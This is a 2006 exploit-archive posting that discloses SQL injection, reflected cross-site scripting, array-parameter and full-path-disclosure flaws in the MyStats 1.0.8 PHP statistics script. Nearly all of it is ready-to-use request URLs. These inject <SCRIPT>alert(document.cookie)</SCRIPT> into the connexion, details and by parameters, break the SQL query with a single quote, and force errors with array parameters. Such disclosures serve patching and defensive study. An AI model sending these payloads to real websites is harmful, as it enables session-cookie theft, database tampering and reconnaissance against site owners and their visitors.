Home / exploits mystats-108.txt
Posted on 14 November 2006
MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure] vendor site: http://emcity.nexenservices.com/mystats/index.php product :MyStats 1.0.8 bug: injection sql, multiples xss, array & full path disclosure risk : medium [1/3] Connexion Variable XSS Exploits: mystats/mystats.php?connexion=<SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime mystats/mystats.php?connexion="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime [2/3] Details Variable Injection Sql, Full Path Disclosure, Array GET & XSS Exploits: mystats/mystats.php?details=' mystats/mystats.php?details[]= mystats/mystats.php?details="'/><SCRIPT>alert(document.cookie)</SCRIPT> [3/3] By Array GET & XSS Exploit: mystats/mystats.php?by[]=admin mystats/mystats.php?connexion=2006-11-12&by="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime [[ Security Access Point ]] Gaffié Laurent & Mossé Benjamin http://s-a-p.ca/ http://209.190.3.234/benjamin-mosse/ contact: saps.audit@gmail.com